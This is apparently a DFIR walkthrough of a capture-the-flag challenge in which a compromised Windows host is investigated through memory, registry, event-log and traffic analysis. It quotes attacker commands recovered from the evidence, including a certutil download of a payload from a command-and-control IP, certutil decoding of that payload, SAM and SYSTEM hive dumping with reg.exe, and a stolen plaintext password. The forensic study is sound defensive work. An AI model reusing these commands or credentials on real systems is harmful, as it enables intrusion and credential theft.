CyberCorp company has been informed that its infrastructure is likely to be compromised, as there are a number of anomalies in its outgoing traffic. The anomalies suggest that a known threat group behind this attack.
CyberCorp's Cybersecurity team isolated one of the potentially compromised hosts from the corporate network and collected artifacts necessary for the investigation: memory dump, OS event logs, registry files, Prefetch files, $MFT file, ShimCache, AmCache, network traffic dumps. You will have to analyze the collected artifacts and answer the questions to complete the investigation.
Information
Category Name: CyberCorp Case 1
Files: c56-CyberCorp.zip 1.08 GB
151M $MFT.copy0
22M OBJECTS.DATA
160B Amcache/
927K AppCompatCache.reg
7.1K Prefetch/
224B Registry Hives/
128B Traffic Dumps/
192B Users Registry Hives/
5.0G memdump.mem
128B winevt/
This is a very good, hands-on challenge about a compromised System. As I was initially solving the challenge, I felt like the usual way of just finding the answers wouldn’t really work. Instead, I decided to really do a full on analysis of the files to figure out what happened, using the questions as context clues. All in all, it’s a very good exercise for DFIR and the methodologies of Forensics investigations.
My Recommendations
This is my personal preference, I like being organized and deleting a folder when I’m done with it.
mkdir Documents/CyberDefenders/CyberCorp1 && cd Documents/CyberDefenders/CyberCorp1Download it from Cyber Defenders and verify the file with sha1sum:
sha1sum /path/to/c56-CyberCorp.zipSHA1: 10805a87e9f5219ba38dd4de4d8d69745a9654f6
Then extract it with the provided the password
Walkthrough
Pre-processing:
mkdir parsed
1. Prefetch files with prefetchruncounts:
prefetchruncounts.py Prefetch
mv *.csv parsed/
2. Event Logs with dumpevtx
#mkdir output
find 'winevt/Logs' -name "*.evtx" -size +69k -print0 | while read -d $'\0' file
do dumpevtx parse "${file}" --output="${file}.txt" 2>/dev/null
mv "${file}.txt" output/
done
Then I wrote this script to save it as a sqlite database
python3 evtx2db.py output parsed/events.db
3. $MFT with ntfs_parser
ntfs_parser --mft '$MFT.copy0' parsed/parsed_mft.csv
4. Objects Data with WMI_Forensics
python2 WMI_Forensics/PyWMIPersistenceFinder.py OBJECTS.DATA > parsed/persistence_objects_data.txt
python2 WMI_Forensics/CCM_RUA_Finder.py -i OBJECTS.DATA -o parsed/objects_data.xls
5. Parse Registry Hives
for f in 'Registry Hives'/*; do
regfexport "$f" > "${f}.txt"
mv "${f}.txt" parsed/
done
find 'Users Registry Hives' -name "*.DAT" -print0 | while read -d $'\0' file
do
regfexport "${file}" > "${file}.txt"
done
6. Build Volatility Timeline
vol.py -f memdump.mem --profile=Win10x64_17134 timeliner --type=EvtLog,IEHistory,ImageDate,LoadTime,Process,Shimcache,Socket,Symlink,Thread,TimeDateStamp,Timer,Userassist,_CMHIVE,_CM_KEY_BODY,_HBASE_BLOCK,Registry --output-file=parsed/timeline.sqlite --output=sqlite
7. Build Final Timeline
I wrote a script to put together all the provided evidence into a sqlite database.
Timeline Summary
Given how the questions aren’t exactly in order, and so much happened in this scenario, I decided to parse all the evidence and make a timeline. I did one timeline only for Events and one timeline for everything. On top of that, I wrote a script that would dump the ‘ScriptBlockText’ component of event ID 4104, which was actually very useful for this challenge.
1. What is the build number of the installed Windows version?
Using RegRipper:
rip.pl -r 'Registry Hives'/software -p winver
Answer: 17134
2. What is the parent process PID of the process, that accepts incoming network connections on the port 1900/UDP?
As we know the build number of the installed Windows version, we run volatility without using the imageinfo plugin.
vol.py --profile=Win10x64_17134 -f memdump.mem netscan | grep UDP | grep 1900
The process in question is svchost.exe, with PID 4688. To find its parent PID, we can use the pstree plugin:
vol.py --profile=Win10x64_17134 -f memdump.mem pstree
The parent process is services.exe – PID 648.
Answer: 648
3. What is the IP address of the attacker command and control center, the connection with which was still active at the time of forensic artifacts acquisition?
First, we must find the acquisition time:
vol.py --profile=Win10x64_17134 -f memdump.mem imageinfo
Then, using Volatility3 and the NetScan plugin:
vol3 -f memdump.mem windows.netscan.NetScan | grep ESTABLISHED
192.168.184.130 is the Machine/Victim IP. But not much more can be resolved from this. On top of that, the pcap files were captured way before the acquisition time. Instead, we can check the System Hive’s Persistent Routes.
cat parsed/system.txt | grep -F 'Parameters\PersistentRoutes' -A 20
The two IPs that are out of the ordinary are 196.6.112.70 and 75.19.45.11. The second IP address does not appear on the established network. We can check the timeline database to find occurrences of these ips. On 2020-06-20 18:32:52, there is an Event record for event ID 4688 for the first IP being added to the IP route table (route -p ADD 196.6.112.70 MASK 255.255.255.255 192.168.184.44)
and on 2020-06-20 19:31:08 the command certutil -urlcache -f http://196.6.112.70/disco.jpg C:\\Windows\\TEMP\\disco.jpg:sh was executed:
The file disco.jpg is in one of the Network Dumps, and is an executable, which will be covered later on.
More importantly, the PID associated with this address is PID 4224, which is for rundll32.exe. This is the process that was compromised (more on that later).
Answer: 196.6.112.70
4. What is the PID of the process where malicious code was located at the moment of forensic artifacts acquisition?
Since I did some analysis before answering the questions, I know that the victim received an email attachment, which downloaded a malicious document, and the payload was stored in the User’s hive under RegisteredApplications\AppXs42fd12c3po92dynnq2r142fs12qhvsmyy. We can retrieve it by grepping for AppXs42fd12c3po92dynnq2r142fs12qhvsmyy:
grep -r 'AppXs42fd12c3po92dynnq2r142fs12qhvsmyy' 'User Hives/' -A 10
Next, we need to base64 decoded it, gunzip it and emulate it to see how it works:
echo -n '#base64encoded' | base64 -d | gunzip > payload
emu_dll.py payload
So the rundll32.exe process is injected (which was the process communicating with the command and control center) with memory protection of ‘PAGE_EXECUTE_READWRITE”. We can use the malfind plugin and compare the bytes of the payload to the output:
Using the malfind plugin:
vol.py --profile=Win10x64_17134 -f memdump.mem malfind
The first instance corresponds to the bytes of the payload:
Output of malfind plugin, showing payload in winlogon.exe
Output of xxd on base64 decoded, gunziped payload.
Winlogon is the only process that contains the payload, so this is where the malicious code was at acquisition.
Answer: 3232
5. On a compromised system, malicious code, discovered in the previous step, is launched every system start...
since the attacker has used one of the persistence techniques. So, what is the name of the autostart entry (those part, that is directly responsible for code execution), used by the attacker for persistence?
Using regripper’s run and cmdproc plugins show no autostart values of interest. However, the output of WMI_Forensics’ script successfully identified persistence techniques from the OBJECTS.DATA file:
cat parsed/persistence_objects_data.txt
The name of the AutoStart entry is LogRotate Consumer, which launches the PowerShell script in the Recent directory. Moreover, the function WMIPersistence in the VBA script of the downloaded template contains the code to achieve this persistence:
Answer: LogRotate Consumer
6. The autostart entry from the previous step is used to launch the script...
which in turn leads to the malicious code execution in the memory of the process, which is discussed in question 4. This code is extracted by script from some system place in the encoded form. The decoded value of this string is executable PE-file. How did Microsoft Antivirus detect this file on 2020-06-21?
As we previously found, the payload is stored in the john.goldberg’s User Hive. We can calculate its hash and submit to Virus Total:
md5sum payload
#returns 6b4592d288b8d98fbc292a4e32a54a83
The file was submitted on 2020-06-21 17:49:49 UTC and was flagged as a Meterpreter by Microsoft:
Answer: Trojan:Win64/Meterpreter.E
7. The process, mentioned in the question 4, isn't the initial process, where malicious code...
described in the previous question, was executed by script from autostart. What is the name of the initial process (in the format program.exe), that is spawned by autostart script and used for further malicious code execution, that subsequently migrates to the address space of the process, mentioned in the question 4.
To answer this question, there are two options. The simpler one is to look at the VBA script of the template downloaded from the Email Attachment:
The source code of the wrapper_page shows that the initial process is dwm.exe:
The second option is to rebuild the ScritBlockText from Event ID 4104 in the PowerShell-Operational.evtx file. I wrote a Python code to help out.
This validates that the initial process was dwm.exe.
Answer: dwm.exe
8. The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process...
which is discussed in question 4. Provide the URL, which was used to download this script from the Internet during the host compromise. The script that runs at each system star (which is described in question 6) was downloaded to the compromised system from the Internet. Provide the URL, which was used to download this script.
The script in question is tmpA7Z2.ps1, which was downloaded from https://raw.githubusercontent.com/xia33F/APT/master/payloads/wrapper_page in the VBS Script of the downloaded template.
9. The system was compromised as the result of a Microsoft Office document opening, received by email.
What is MD5 hash of this document (for example, d41d8cd98f00b204e9800998ecf8427e)?
**I solved this question first, and it’s what made me want to do a bigger analysis/timeline to understand what really went down.
First, we must find out if there are any pst/ost files in the memory dump that we can extract:
vol.py --profile=Win10x64_17134 -f memdump.mem filescan > filescan.txt
cat filescan.txt | grep -F '.pst'
Success! Now we just need to dump the files and extract them to find the attachment:
mkdir pst
vol.py --profile=Win10x64_17134 -f memdump.mem dumpfiles -r pst$ -u -n -D pst
cd pst
find . -type f -exec readpst -m -tea "{}" \;
find . -type f
Perfect, now we can check which eml files contain an attachment:
grep -r 'filename='
#returns john.goldberg@cybercorp.com/Inbox/2.eml: filename="attach.zip"
#john.goldberg@cybercorp.com/Inbox/1.eml: filename="attach.zip"
However, 2.eml contains a valid attachment. We can quickly extract it with this oneliner, and unzip it:
cat john.goldberg@cybercorp.com/Inbox/2.eml | grep -F 'filename=' -A 200000 | head -n -4 | tail -n +3 | base64 -d > attach.zip
unzip attach.zip
#password is required
Let’s find out if a password was given in the email:
cat john.goldberg@cybercorp.com/Inbox/2.eml | head -n 40
And it has! 
7z x -p1234 attach.zip
md5sum 'Why Saudi Arabia Will Lose The Next Oil Price War.docx'
#returns aa7ee7f712780aebe9136cabc24bf875
Answer: aa7ee7f712780aebe9136cabc24bf875
10. The document, that was initially opened by user, didn't contain anything malicious itself.
It downloaded another document from the Internet as a Microsoft Word template. Malicious code, which has led to the system compromise, is located inside this template directly. What link was used by the first document to download the second document as a template (for example, https://address/file.com)?
We can unzip the document, and look at the relationship files for a potential URL, since it contains no VBA/Ole objects.
7z x 'Why Saudi Arabia Will Lose The Next Oil Price War.docx' -oMalDoc
find . -name "*.rels" -exec xmldump.py pretty "{}" \;
11. During the post-exploitation attacker delivered to the compromised host a special Active Directory Enumeration utility.
Which link did the attacker use to download this utility (for example, https://address/file.com)?
In Question 3, we saw that there was a Security Event Log for a file named ‘disco.jpg’ associated with the attacker’s IP. The file can be found and extracted from capture_2.pcapng. In wireshark, select Export Objects > HTTP and filter for disco.jpg. The file is actually a ‘certificate’:
Which we can decode:
strings disco.jpg | sed '/CERTIFICATE/d' | tr -d '\n'| base64 -d > disco
file disco
#returns PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Given that it is a .Net assembly, we can use ilspycmd
mkdir Disco
ilspycmd -p -o Disco disco
ls -la Disco
12. As described in the previous question utility has created several files in the compromised system, that subsequently were deleted by an attacker.
One of the created files had a bin extension. What is the name of this file (for example, name.bin)?
In Question 3 we identified that certutil was used to download the SharpHound executable, the command used is often associated with malware. We can look in the timeline again for ‘disco.jpg’:
at 2020-06-20 19:31:16 the following command was issued: certutil -decode C:\\Windows\\TEMP\\disco.jpg:sh C:\\Windows\\TEMP\\sh.exe
and it was saved in the Temp directory as sh.exe. Now, we can filter the timeline for ‘sh.exe’ in Filename, and we will see a prefetch record, for last run at 2020-06-20 19:31:34 (also the only time it ran):
Finally, we just need to filter the RecordType for MFT, Filename with ‘.bin‘ and Timestamp with 2020-06-20 19:3 :
This file was created in the same directory as where sh.exe was stored. It doesn’t appear in neither the filescan/mft plugin of the memory dump, so we can assume it was deleted.
Answer: ODNHN2YWNWUTYWFMYY00MDVMLWFHYTQTNGMZM2Q3NMYWMWM4.BIN
13. During the post-exploitation attacker has compromised a privileged user account. What is its password?
I am using the Events timeline and Filtering for ‘Security.evtx’ in Filename, and ‘CommandLine’ in EventData, and the date as ‘2020-06-20 19:3’:
Here is the first intersting chunk. The attacker looked for localgroup administrators. Then he saved the SAM and SYSTEM hives: 
and finally used the dumped credentials to access the DC:
The user is backupsrv and has password !!feb15th2k6!!.
Answer: !!feb15th2k6!!
14. What is the name of the tool (for example, program.exe), that probably was used by an attacker to compromise the user account?
The second image above shows that the user used reg.exe to save the hives and then magically came back two minutes later to access the DC with the correct password. In the full timeline, filtering for the exact date of the reg command, there is MFT and Prefetch records for reg.exe:
Answer: reg.exe
15. The attacker used a compromised account for unauthorized Domain Controller access. What is the IP address of this Domain Controller?
The third screenshot in Question 13 shows how the user accessed the DC through user backupsrv. The IP is 192.168.184.100.
Answer: 192.168.184.100
TLDR
This was a very complete and quite hard challenge. In my opinion, it’s best to approach this challenge by trying to timeline the events, aka do a ‘proper‘ forensics investigation.
It’s great to understand and visualize AD attacks on the Blue Team side.
